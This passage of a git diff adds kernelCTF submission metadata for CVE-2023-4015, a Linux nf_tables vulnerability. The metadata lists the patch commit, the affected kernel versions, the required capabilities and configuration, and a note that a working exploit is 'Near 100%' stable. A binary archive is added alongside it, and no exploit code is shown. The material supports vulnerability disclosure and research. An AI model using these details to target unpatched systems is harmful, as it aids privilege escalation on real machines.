"https://google.github.io/security-research/kernelctf/metadata.schema.v3.json", + "submission_ids": [ + "exp96" + ], + "vulnerability": { + "patch_commit": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=0a771f7b266b02d262900c75f1e175c7fe76fec2", + "cve": "CVE-2023-4015", + "affected_versions": [ + "5.10.188 - 5.10.189", + "5.15.119 - 5.15.123", + "6.1.36 - 6.1.42", + "6.3.10 - 6.3.13", + "6.4 - 6.4.7", + "6.5-rc1 - 6.5-rc3" + ], + "requirements": { + "attack_surface": [ + "userns" + ], + "capabilities": [ + "CAP_NET_ADMIN" + ], + "kernel_config": [ + "CONFIG_NF_TABLES" + ] + } + }, + "exploits": { + "cos-105-17412.156.23": { + "uses": [ + "userns" + ], + "requires_separate_kaslr_leak": false, + "stability_notes": "Near 100%" + } + } +} \ No newline at end of file diff --git a/pocs/linux/kernelctf/CVE-2023-4015_cos/original.tar.gz b/pocs/linux/kernelctf/CVE-2023-4015_cos/original.tar.gz new file mode 100644 index 00000000..a2658d84 Binary files /dev/null and b/pocs/linux/kernelctf/CVE-2023-4015_cos/original.tar.gz differ